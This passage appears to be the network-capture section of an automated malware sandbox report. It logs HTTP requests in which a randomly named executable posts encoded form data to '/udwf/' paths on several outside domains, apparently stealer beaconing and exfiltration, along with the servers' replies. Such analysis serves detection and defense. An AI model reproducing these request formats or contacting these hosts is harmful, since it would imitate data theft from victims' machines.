                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                            Origin: http://www.lxdedu.com
                                                                                                                            Referer: http://www.lxdedu.com/udwf/
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Content-Length: 1220
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: no-cache
                                                                                                                            User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                            Data Raw: 47 30 59 78 64 32 51 3d 37 4e 4d 48 6d 50 5a 6e 39 49 6f 6a 53 2f 66 6d 52 41 65 4c 53 53 4d 4e 39 6c 48 73 45 57 74 47 58 72 70 35 6b 74 53 50 6c 66 4b 69 6d 52 50 7a 78 74 73 5a 33 76 79 6c 68 36 54 2f 72 57 35 70 6f 53 6b 34 33 7a 73 52 45 45 4c 58 39 54 71 62 44 51 6e 30 35 6a 66 4f 74 73 54 50 46 34 73 37 51 5a 2b 6c 67 39 74 6f 4d 76 2b 45 65 31 67 2b 55 36 41 32 74 30 48 34 31 75 71 48 70 77 69 76 57 64 79 53 73 6a 7a 77 41 71 4d 6a 4d 34 6b 70 78 75 6b 38 52 71 39 6b 68 2f 42 6f 6b 6e 34 58 58 73 45 48 6c 47 59 54 34 78 70 39 50 6f 2b 4b 45 6f 2f 33 47 51 72 57 6a 43 6c 42 33 54 49 7a 50 37 35 33 76 69 2f 62 68 45 51 61 53 71 69 36 75 37 51 73 62 6a 6f 36 79 54 78 62 2b 36 64 42 76 6b 79 79 57 77 6c 59 68 68 6b 51 5a 38 6f 70 49 73 51 30 57 35 32 73 4d 4b 77 32 71 41 37 66 79 4a 46 37 49 2b 50 76 4c 52 79 4a 38 6f 67 6c 42 44 70 61 33 36 4f 2f 32 64 47 36 49 4a 6e 2f 37 7a 48 67 6f 46 4e 41 4f 4c 6f 6c 77 32 52 41 79 62 39 68 4d 37 6d 65 59 4a 5a 50 4a 32 52 4f 7a 49 70 55 61 45 75 52 73 44 6f 5a 74 46 62 55 48 37 65 32 32 7a 4d 58 78 36 71 51 38 4b 45 41 55 2f 50 4f 39 49 37 6a 54 36 50 76 4b 41 43 47 44 77 76 69 55 57 69 6b 2b 38 67 62 56 6f 64 56 2b 61 36 6c 37 71 46 48 71 42 32 66 66 4f 39 6a 5a 66 4c 4f 59 6d 55 68 63 74 72 49 38 65 4e 4c 4b 63 36 32 42 79 6b 6c 36 4c 33 46 6f 78 4f 64 32 46 6f 31 6a 32 2f 33 76 37 34 6f 75 74 51 6d 61 6e 72 5a 67 53 4d 4c 4b 46 67 76 44 6a 73 41 5a 62 41 6e 48 50 5a 65 61 79 66 4b 78 6e 51 39 35 43 47 55 35 65 72 2f 36 45 45 35 73 2f 4d 46 44 65 33 52 6a 70 71 78 79 71 63 73 44 73 62 43 32 7a 45 32 36 74 67 48 6e 78 78 68 30 47 6f 58 63 79 6d 53 4c 7a 62 70 31 4f 4b 6f 77 58 44 34 72 4b 4b 34 39 6d 6b 48 39 30 59 5a 79 6c 71 4f 6e 48 4b 53 4a 57 64 62 79 79 63 43 39 67 5a 64 47 49 37 57 51 37 79 58 35 59 48 78 4e 43 4b 79 34 63 72 61 73 2f 57 51 65 79 38 59 54 6e 2f 33 41 33 43 71 6f 79 42 45 44 6e 41 73 50 63 76 78 51 56 73 53 6b 6d 6d 76 2b 67 58 71 4f 33 67 63 64 52 30 73 4a 43 55 4d 79 41 4b 63 6b 50 67 6f 33 37 55 33 6d 58 4b 36 51 64 69 65 73 6c 30 55 42 44 65 6c 36 45 43 58 67 53 6f 52 6f 4b 2b 7a 70 66 70 59 4e 66 4b 56 6e 2f 4c 45 66 31 5a 75 4d 43 2f 43 63 32 53 49 58 66 43 50 4d 65 70 59 46 34 4e 2b 63 73 6a 59 59 2b 62 50 67 78 44 69 7a 35 67 39 6f 77 52 61 73 33 6a 69 6b 72 34 6d 79 41 36 55 75 6f 4d 72 45 48 63 73 6e 57 57 51 54 32 32 75 5a 59 5a 74 66 4c 48 71 41 32 31 75 47 48 79 79 42 79 72 57 6e 61 30 65 6d 74 6d 4e 71 71 49 5a 45 42 59 78 6e 2f 4f 76 6d 55 33 38 57 30 44 77 77 6f 33 6d 57 4c 39 64 76 6d 6f 37 50 30 79 64 35 4c 42 57 35 2f 33 39 4c 69 34 38 43 79 6a 6b 4e 45 65 6d 54 55 38 52 30 50 56 44 57 71 6c 42 53 44 73 51 61 39 4a 41 33 57 4b 58 43 2f 70 6b 58 4c 55 67 74 7a 79 42 78 47 6b 70 64 45 35 52 38 7a 31 66 57 77 4c 6c 61 36 6f 56 4d 73 34 49 66 6a 6d 30 30 71 52 6c 48 65 4b 6f 74 47 53 71 4c 32 43 74 55 64 2f 49 46 72 4c 42 74 78 74 68 5a 31 32 65 48 4c 63 44 35 6e 78 4f 56 4a 57 63 55 57 4b 63 35 38 4f 73 66 53 76 4c 43 33 62 79 48 48 77 31 33 32 41 78 66 6a 6e 56 53 74 48 54 68 42 79 78 69 2f 67 69 6d 54 66 6d 51 32 66 38 67 52 44 57 56 2f 6d 37 53 32 50 6e 2f 6b 70 36 61 6b 4a 4f 48 76 62 77 4f 50 63 6b 39 6f 72 39 6a 54 71 4b 63 50 56 64 50 59 6c 78 2f 74 58 78 46 76 75 64 53 63 49 72 6b 77 37 68 62 50 35 72 32 34 69 50 44 72 4b 69 30 41 44 31 6d 77 77 45 71 77 4d 64 6a 2b 78 58 49 31 62 36 37 36 6b 68 75 33 6d 75 4d 38 78 34 6c 44 44 63 32 43 62 68 56 77 54 61 39 32 31 6f 4a 2b 42 78 6a 67 77 2b 47 64 49 34 4e 59 44 47 35 70 4b 6f 4b 73 75 45 6e 61 64 55 68 47 48 78 6f 50 43 35 73 50 39 65 57 6c 66 36 49 4e 55 62 4c 33 5a 56 70 65 6a 34 76 34 65 35 50 54 61 52 6d 65 52 74 4c 7a 52 51 75 36 66 79 6c 64 38 72
                                                                                                                            Data Ascii: G0Yxd2Q=7NMHmPZn9IojS/fmRAeLSSMN9lHsEWtGXrp5ktSPlfKimRPzxtsZ3vylh6T/rW5poSk43zsREELX9TqbDQn05jfOtsTPF4s7QZ+lg9toMv+Ee1g+U6A2t0H41uqHpwivWdySsjzwAqMjM4kpxuk8Rq9kh/Bokn4XXsEHlGYT4xp9Po+KEo/3GQrWjClB3TIzP753vi/bhEQaSqi6u7Qsbjo6yTxb+6dBvkyyWwlYhhkQZ8opIsQ0W52sMKw2qA7fyJF7I+PvLRyJ8oglBDpa36O/2dG6IJn/7zHgoFNAOLolw2RAyb9hM7meYJZPJ2ROzIpUaEuRsDoZtFbUH7e22zMXx6qQ8KEAU/PO9I7jT6PvKACGDwviUWik+8gbVodV+a6l7qFHqB2ffO9jZfLOYmUhctrI8eNLKc62Bykl6L3FoxOd2Fo1j2/3v74outQmanrZgSMLKFgvDjsAZbAnHPZeayfKxnQ95CGU5er/6EE5s/MFDe3RjpqxyqcsDsbC2zE26tgHnxxh0GoXcymSLzbp1OKowXD4rKK49mkH90YZylqOnHKSJWdbyycC9gZdGI7WQ7yX5YHxNCKy4cras/WQey8YTn/3A3CqoyBEDnAsPcvxQVsSkmmv+gXqO3gcdR0sJCUMyAKckPgo37U3mXK6Qdiesl0UBDel6ECXgSoRoK+zpfpYNfKVn/LEf1ZuMC/Cc2SIXfCPMepYF4N+csjYY+bPgxDiz5g9owRas3jikr4myA6UuoMrEHcsnWWQT22uZYZtfLHqA21uGHyyByrWna0emtmNqqIZEBYxn/OvmU38W0Dwwo3mWL9dvmo7P0yd5LBW5/39Li48CyjkNEemTU8R0PVDWqlBSDsQa9JA3WKXC/pkXLUgtzyBxGkpdE5R8z1fWwLla6oVMs4Ifjm00qRlHeKotGSqL2CtUd/IFrLBtxthZ12eHLcD5nxOVJWcUWKc58OsfSvLC3byHHw132AxfjnVStHThByxi/gimTfmQ2f8gRDWV/m7S2Pn/kp6akJOHvbwOPck9or9jTqKcPVdPYlx/tXxFvudScIrkw7hbP5r24iPDrKi0AD1mwwEqwMdj+xXI1b676khu3muM8x4lDDc2CbhVwTa921oJ+Bxjgw+GdI4NYDG5pKoKsuEnadUhGHxoPC5sP9eWlf6INUbL3ZVpej4v4e5PTaRmeRtLzRQu6fyld8r
                                                                                                                            Nov 10, 2023 09:29:21.615573883 CET253INHTTP/1.1 404 Not Found
                                                                                                                            Content-Type: text/html
                                                                                                                            Server: Microsoft-IIS/8.5
                                                                                                                            Date: Fri, 10 Nov 2023 08:29:19 GMT
                                                                                                                            Connection: close
                                                                                                                            Content-Length: 596
                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 67 62 32 33 31 32 22 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 d5 d2 b2 bb b5 bd ce c4 bc fe bb f2 c4 bf c2 bc a1 a3 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0d 0a 76 61 72 20 4c 3d 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2c 44 3d 64 6f 63 75 6d 65 6e 74 2c 61 3d 4c 2e 70 61 74 68 6e 61 6d 65 2c 62 3d 22 22 2c 63 3d 22 2f 22 2c 64 3d 22 6c 65 6e 67 74 68 22 3b 0d 0a 61 3d 61 2e 73 70 6c 69 74 28 63 29 3b 0d 0a 66 6f 72 28 76 61 72 20 69 3d 31 3b 69 3c 61 5b 64 5d 2d 32 3b 69 2b 2b 29 7b 62 2b 3d 63 2b 61 5b 69 5d 3b 7d 0d 0a 62 2b 3d 63 3b 0d 0a 44 2e 77 72 69 74 65 28 22 42 61 63 6b 20 74 6f 20 3c 61 20 68 72 65 66 3d 5c 22 22 2b 62 2b 22 5c 22 3e 22 2b 4c 2e 68 6f 73 74 2b 62 2b 22 3c 2f 61 3e 20 2c 20 77 61 69 74 69 6e 67 2e 2e 2e 2e 2e 22 29 3b 0d 0a 73 65 74 54 69 6d 65 6f 75 74 28 66 75 6e 63 74 69 6f 6e 28 29 7b 4c 2e 68 72 65 66 3d 62 3b 7d 2c 22 32 30 30 22 29 3b 0d 0a 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e
                                                                                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=gb2312"><title>404 - </title></head><body><script type="text/javascript">var L=window.location,D=document,a=L.pathname,b="",c="/",d="length";a=a.split(c);for(var i=1;i<a[d]-2;i++){b+=c+a[i];}b+=c;D.write("Back to <a href=\""+b+"\">"+L.host+b+"</a> , waiting.....");setTimeout(function(){L.href=b;},"200");</script></body></html>


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                            28192.168.2.1049743168.76.252.9980C:\Program Files (x86)\dNAGqKTZGUAwaxVqazHCxkYGeHKBIiEYPiPMKrHtQXpznvGBaeqnolUoXkFHVbdDlBIbtsRYWxSQYDD\xIXlFDyvSnsfUSfsjsGwj.exe
                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                            Nov 10, 2023 09:29:24.141567945 CET254OUTGET /udwf/?G0Yxd2Q=2Pknl6RP8eYVb4X6Jw71HBsX3EzDU15MYpkSqP6Wnui62FTd2NB7+fGHhL+jrHNDvCcs8SUxdlzs7m6tHUr/+njhj/XBKtkfTg==&vhQT=aV8PeNo0MvDl1 HTTP/1.1
                                                                                                                            Host: www.lxdedu.com
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            Connection: close
                                                                                                                            User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                            Nov 10, 2023 09:29:24.497469902 CET255INHTTP/1.1 404 Not Found
                                                                                                                            Content-Type: text/html
                                                                                                                            Server: Microsoft-IIS/8.5
                                                                                                                            Date: Fri, 10 Nov 2023 08:29:23 GMT
                                                                                                                            Connection: close
                                                                                                                            Content-Length: 596
                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 67 62 32 33 31 32 22 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 d5 d2 b2 bb b5 bd ce c4 bc fe bb f2 c4 bf c2 bc a1 a3 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0d 0a 76 61 72 20 4c 3d 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2c 44 3d 64 6f 63 75 6d 65 6e 74 2c 61 3d 4c 2e 70 61 74 68 6e 61 6d 65 2c 62 3d 22 22 2c 63 3d 22 2f 22 2c 64 3d 22 6c 65 6e 67 74 68 22 3b 0d 0a 61 3d 61 2e 73 70 6c 69 74 28 63 29 3b 0d 0a 66 6f 72 28 76 61 72 20 69 3d 31 3b 69 3c 61 5b 64 5d 2d 32 3b 69 2b 2b 29 7b 62 2b 3d 63 2b 61 5b 69 5d 3b 7d 0d 0a 62 2b 3d 63 3b 0d 0a 44 2e 77 72 69 74 65 28 22 42 61 63 6b 20 74 6f 20 3c 61 20 68 72 65 66 3d 5c 22 22 2b 62 2b 22 5c 22 3e 22 2b 4c 2e 68 6f 73 74 2b 62 2b 22 3c 2f 61 3e 20 2c 20 77 61 69 74 69 6e 67 2e 2e 2e 2e 2e 22 29 3b 0d 0a 73 65 74 54 69 6d 65 6f 75 74 28 66 75 6e 63 74 69 6f 6e 28 29 7b 4c 2e 68 72 65 66 3d 62 3b 7d 2c 22 32 30 30 22 29 3b 0d 0a 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e
                                                                                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=gb2312"><title>404 - </title></head><body><script type="text/javascript">var L=window.location,D=document,a=L.pathname,b="",c="/",d="length";a=a.split(c);for(var i=1;i<a[d]-2;i++){b+=c+a[i];}b+=c;D.write("Back to <a href=\""+b+"\">"+L.host+b+"</a> , waiting.....");setTimeout(function(){L.href=b;},"200");</script></body></html>


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                            29192.168.2.104974435.227.246.10480C:\Program Files (x86)\dNAGqKTZGUAwaxVqazHCxkYGeHKBIiEYPiPMKrHtQXpznvGBaeqnolUoXkFHVbdDlBIbtsRYWxSQYDD\xIXlFDyvSnsfUSfsjsGwj.exe
                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                            Nov 10, 2023 09:29:29.831724882 CET256OUTPOST /udwf/ HTTP/1.1
                                                                                                                            Host: www.xn--4gq62f8w1alm9b.xyz
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                            Origin: http://www.xn--4gq62f8w1alm9b.xyz
                                                                                                                            Referer: http://www.xn--4gq62f8w1alm9b.xyz/udwf/
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Content-Length: 188
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: no-cache
                                                                                                                            User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                            Data Raw: 47 30 59 78 64 32 51 3d 31 51 77 6c 4b 4b 30 51 44 45 6e 68 72 76 67 46 6b 4a 34 52 55 77 2f 61 30 33 79 2f 6c 4b 4f 34 6b 6c 55 51 68 71 66 47 41 59 4d 66 64 4f 55 5a 5a 41 6c 43 71 55 64 6e 65 37 70 6a 31 73 5a 71 4c 63 54 30 44 7a 56 4f 66 6d 4f 50 65 6b 68 4e 61 4f 45 45 4e 33 69 32 62 4c 32 4e 35 63 31 44 75 44 42 48 74 6d 46 53 51 42 6d 46 61 6d 39 64 6a 61 49 47 4c 59 52 4c 47 42 71 52 66 34 7a 52 50 30 38 45 56 73 64 39 43 6d 45 2f 31 38 47 2f 52 77 54 61 4c 73 33 48 78 75 53 51 52 45 65 4b 61 47 32 71 79 33 34 46 48 6b 56 6b 68 6b 75 31 73 41 3d 3d
                                                                                                                            Data Ascii: G0Yxd2Q=1QwlKK0QDEnhrvgFkJ4RUw/a03y/lKO4klUQhqfGAYMfdOUZZAlCqUdne7pj1sZqLcT0DzVOfmOPekhNaOEEN3i2bL2N5c1DuDBHtmFSQBmFam9djaIGLYRLGBqRf4zRP08EVsd9CmE/18G/RwTaLs3HxuSQREeKaG2qy34FHkVkhku1sA==
                                                                                                                            Nov 10, 2023 09:29:30.122710943 CET256INHTTP/1.1 405 Not Allowed
                                                                                                                            Server: nginx/1.20.2
                                                                                                                            Date: Fri, 10 Nov 2023 08:29:29 GMT
                                                                                                                            Content-Type: text/html
                                                                                                                            Content-Length: 157
                                                                                                                            Via: 1.1 google
                                                                                                                            Connection: close
                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 30 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                            Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.20.2</center></body></html>


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                            3192.168.2.104971723.227.38.7480C:\Program Files (x86)\dNAGqKTZGUAwaxVqazHCxkYGeHKBIiEYPiPMKrHtQXpznvGBaeqnolUoXkFHVbdDlBIbtsRYWxSQYDD\xIXlFDyvSnsfUSfsjsGwj.exe
                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                            Nov 10, 2023 09:27:50.716406107 CET95OUTPOST /udwf/ HTTP/1.1
                                                                                                                            Host: www.littlehappiez.com
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                            Origin: http://www.littlehappiez.com
                                                                                                                            Referer: http://www.littlehappiez.com/udwf/
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Content-Length: 1220
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: no-cache
                                                                                                                            User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                            Data Raw: 47 30 59 78 64 32 51 3d 51 31 2f 6c 4d 2b 73 36 4f 59 33 6a 65 71 78 2f 77 4d 69 61 62 68 49 57 75 52 47 63 4c 47 4b 37 47 6b 68 53 36 44 47 64 6a 4d 57 6c 77 2b 39 6c 49 49 69 68 35 51 53 42 4f 4f 38 47 52 66 51 7a 5a 45 63 58 53 76 45 53 76 69 6e 70 52 6e 78 33 2f 72 75 63 79 4c 72 43 6e 49 45 56 65 54 4c 30 63 50 6d 69 6f 50 4a 34 6c 59 78 38 61 4b 6c 44 74 64 49 4b 39 6b 53 76 67 32 32 48 78 66 6e 31 6a 59 64 39 56 33 68 58 4d 75 76 61 75 35 78 33 35 39 56 37 6c 57 78 4f 76 33 4e 7a 33 44 69 61 71 75 4b 47 5a 74 56 5a 36 4a 35 63 2b 77 6b 69 67 6c 4b 49 74 77 6a 77 71 72 49 33 44 37 75 78 4b 75 32 67 35 37 42 34 2b 69 44 49 46 46 47 50 6d 31 6f 62 61 37 69 79 4f 76 4d 56 48 69 68 6c 38 57 58 41 6e 4f 2b 51 53 63 7a 4d 69 76 49 4b 55 6a 6e 57 73 31 6e 4e 43 57 35 67 38 41 6f 54 63 55 51 51 55 52 50 63 77 74 37 54 30 47 46 34 7a 56 75 4c 41 50 6a 57 33 53 31 6b 6b 6c 75 32 5a 59 51 4c 68 6f 51 64 7a 51 54 6a 54 77 6d 65 6f 71 52 64 6c 65 6c 6b 6f 6e 39 73 4f 4f 44 56 30 64 44 51 44 59 73 7a 58 34 49 67 66 42 6d 38 49 31 6b 68 67 70 4b 58 6d 78 50 43 48 33 4d 64 33 48 38 4a 48 33 77 50 46 67 68 39 35 51 51 64 38 6e 34 34 46 49 37 30 66 62 64 44 5a 63 41 6f 53 48 31 56 72 56 6f 41 32 71 31 49 35 4e 61 34 4b 57 53 49 6e 4a 4a 76 68 63 44 51 33 53 4c 53 54 37 63 31 55 67 6d 72 50 69 7a 4f 61 43 6b 52 59 4b 73 70 59 41 45 52 31 46 33 58 52 59 75 64 50 44 64 34 5a 2b 4e 67 36 33 7a 6f 4f 33 7a 43 55 4a 56 61 44 74 5a 73 2b 7a 43 6b 46 45 4c 76 67 53 70 62 51 78 38 2b 48 69 58 2b 72 33 2f 75 6b 58 33 79 78 64 61 79 4f 68 59 61 35 54 4b 77 39 43 67 6f 4e 43 35 37 7a 4a 4e 49 6f 69 6e 55 59 6b 6d 72 52 6e 39 62 45 4c 71 64 72 74 48 44 4d 4a 5a 34 39 6c 35 58 4b 42 4d 76 59 39 55 77 62 45 63 57 61 35 4c 36 56 33 71 69 69 6c 65 42 35 2b 38 77 59 6b 30 41 66 62 69 61 44 72 44 44 33 43 6b 4d 65 57 38 37 34 73 66 7a 68 4e 68 59 67 74 6a 6e 4d 65 75 59 74 2f 42 31 4b 50 35 38 47 50 67 73 78 61 37 64 71 31 2f 68 45 68 42 43 4f 34 72 5a 2b 4b 36 46 56 79 56 67 68 4a 36 73 66 32 6f 39 44 6b 78 4c 44 42 58 56 71 59 77 6a 32 63 6b 34 67 4a 4d 52 36 57 73 53 53 53 4b 79 48 65 73 32 5a 59 38 2f 71 34 4e 51 57 32 45 2b 75 49 4e 56 67 37 41 30 6b 4b 66 38 55 79 6e 64 64 69 4a 66 39 2f 47 61 59 57 54 78 37 49 46 61 66 72 67 65 48 6a 44 46 69 58 69 44 30 7a 4d 52 4a 63 32 44 6f 4a 57 2b 42 2b 38 56 70 49 61 79 36 69 77 76 55 4d 43 66 44 62 69 64 36 49 55 48 6d 49 4e 6d 4d 67 74 33 65 36 4e 61 2b 65 33 36 46 68 69 51 75 48 51 69 44 31 39 70 33 62 5a 4f 61 78 2f 2f 46 66 63 59 79 48 4e 6e 61 47 33 76 59 30 41 4d 74 4f 2f 6a 79 43 30 7a 53 48 33 6b 51 70 35 6a 2f 64 5a 52 4a 37 37 30 53 78 66 4c 53 4a 53 4d 51 41 54 41 36 50 70 6d 41 53 33 72 6c 77 45 2b 6c 34 74 65 6b 34 6e 4a 65 42 32 46 31 32 50 48 37 57 42 4e 4e 55 68 53 4e 71 74 63 6f 32 56 78 64 33 35 4e 2b 6d 2b 34 71 6a 32 64 43 48 7a 4e 34 70 50 62 64 61 52 32 49 4d 49 57 58 35 71 75 53 78 61 74 69 6e 52 69 72 6a 75 2b 59 6c 6f 4b 6d 52 50 4f 78 4b 45 6a 44 61 73 65 72 55 72 56 32 64 52 69 59 30 74 2f 36 36 74 62 50 34 5a 6a 5a 58 53 79 30 2f 49 45 34 59 45 68 4e 78 74 52 33 6a 46 56 55 75 61 56 56 4f 75 4f 38 31 68 78 47 66 2b 38 61 37 4b 6e 79 5a 69 5a 31 76 76 4c 74 59 5a 73 2f 50 35 37 37 2b 6a 68 58 6f 79 70 6b 6c 6f 76 47 47 38 4a 71 4c 58 63 63 5a 42 72 49 36 37 70 78 6c 52 67 43 70 75 56 52 75 64 59 4c 54 6e 4f 2b 5a 63 33 78 74 70 4d 46 58 4c 78 32 55 62 79 4f 5a 79 75 38 6a 41 41 67 71 47 79 5a 42 61 49 61 33 49 5a 6b 4b 70 6e 46 58 42 44 76 70 66 4a 44 6c 56 76 6b 45 4f 58 4c 5a 6b 45 65 6e 6c 51 2b 36 39 56 74 42 5a 7a 62 7a 4d 77 31 52 45 65 37 45 7a 58 49 4d 4a 49 38 57 43 50 31 47 61 35 6d 2b 32 56 7a 33 4c 63 44 63 53 39 6e 69 35 32 6b 6a 54 4b
                                                                                                                            Data Ascii: G0Yxd2Q=Q1/lM+s6OY3jeqx/wMiabhIWuRGcLGK7GkhS6DGdjMWlw+9lIIih5QSBOO8GRfQzZEcXSvESvinpRnx3/rucyLrCnIEVeTL0cPmioPJ4lYx8aKlDtdIK9kSvg22Hxfn1jYd9V3hXMuvau5x359V7lWxOv3Nz3DiaquKGZtVZ6J5c+wkiglKItwjwqrI3D7uxKu2g57B4+iDIFFGPm1oba7iyOvMVHihl8WXAnO+QSczMivIKUjnWs1nNCW5g8AoTcUQQURPcwt7T0GF4zVuLAPjW3S1kklu2ZYQLhoQdzQTjTwmeoqRdlelkon9sOODV0dDQDYszX4IgfBm8I1khgpKXmxPCH3Md3H8JH3wPFgh95QQd8n44FI70fbdDZcAoSH1VrVoA2q1I5Na4KWSInJJvhcDQ3SLST7c1UgmrPizOaCkRYKspYAER1F3XRYudPDd4Z+Ng63zoO3zCUJVaDtZs+zCkFELvgSpbQx8+HiX+r3/ukX3yxdayOhYa5TKw9CgoNC57zJNIoinUYkmrRn9bELqdrtHDMJZ49l5XKBMvY9UwbEcWa5L6V3qiileB5+8wYk0AfbiaDrDD3CkMeW874sfzhNhYgtjnMeuYt/B1KP58GPgsxa7dq1/hEhBCO4rZ+K6FVyVghJ6sf2o9DkxLDBXVqYwj2ck4gJMR6WsSSSKyHes2ZY8/q4NQW2E+uINVg7A0kKf8UynddiJf9/GaYWTx7IFafrgeHjDFiXiD0zMRJc2DoJW+B+8VpIay6iwvUMCfDbid6IUHmINmMgt3e6Na+e36FhiQuHQiD19p3bZOax//FfcYyHNnaG3vY0AMtO/jyC0zSH3kQp5j/dZRJ770SxfLSJSMQATA6PpmAS3rlwE+l4tek4nJeB2F12PH7WBNNUhSNqtco2Vxd35N+m+4qj2dCHzN4pPbdaR2IMIWX5quSxatinRirju+YloKmRPOxKEjDaserUrV2dRiY0t/66tbP4ZjZXSy0/IE4YEhNxtR3jFVUuaVVOuO81hxGf+8a7KnyZiZ1vvLtYZs/P577+jhXoypklovGG8JqLXccZBrI67pxlRgCpuVRudYLTnO+Zc3xtpMFXLx2UbyO